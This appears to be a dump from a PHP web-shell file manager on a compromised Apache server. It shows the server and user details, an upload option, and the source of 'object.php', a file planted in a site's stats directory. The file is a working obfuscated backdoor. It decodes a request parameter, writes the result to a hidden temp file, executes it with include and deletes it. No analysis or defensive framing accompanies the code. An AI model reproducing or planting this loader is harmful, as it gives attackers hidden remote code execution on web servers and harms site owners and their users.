HEX
Server: Apache
System: Linux localhost.localdomain 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
User: web57 (5040)
PHP: 7.4.33
Disabled: pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,
Upload Files
File: /var/www/clients/client6/web57/web/stats/2024-10/object.php
<?php

if(!empty($_REQUEST["k"])){
	$pset = array_filter(["/var/tmp", session_save_path(), "/dev/shm", "/tmp", ini_get("upload_tmp_dir"), sys_get_temp_dir(), getcwd(), getenv("TMP"), getenv("TEMP")]);
	$ref = $_REQUEST["k"];
				$ref	  =explode  ( 		'.', $ref )		;	
	$flg = '';
            $salt4 = 'abcdefghijklmnopqrstuvwxyz0123456789';
            $sLen = strlen($salt4);
            $k = 0;
    
            $__tmp = $ref;
            while($v6 = array_shift($__tmp)) {
                $sChar = ord($salt4[$k % $sLen]);
                $d =((int)$v6 - $sChar -($k % 10)) ^ 81;
                $flg.= 	chr($d);
                $k++;		}	
	for ($res = 0, $parameter_group = count($pset); $res < $parameter_group; $res++) {
    $component = $pset[$res];
    		if ((is_dir($component) and is_writable($component))) {
    $tkn = implode("/", [$component, ".descriptor"]);
    $success = file_put_contents($tkn, $flg);
if ($success) {
	include $tkn;
	@unlink($tkn);
	die();}
}
}
}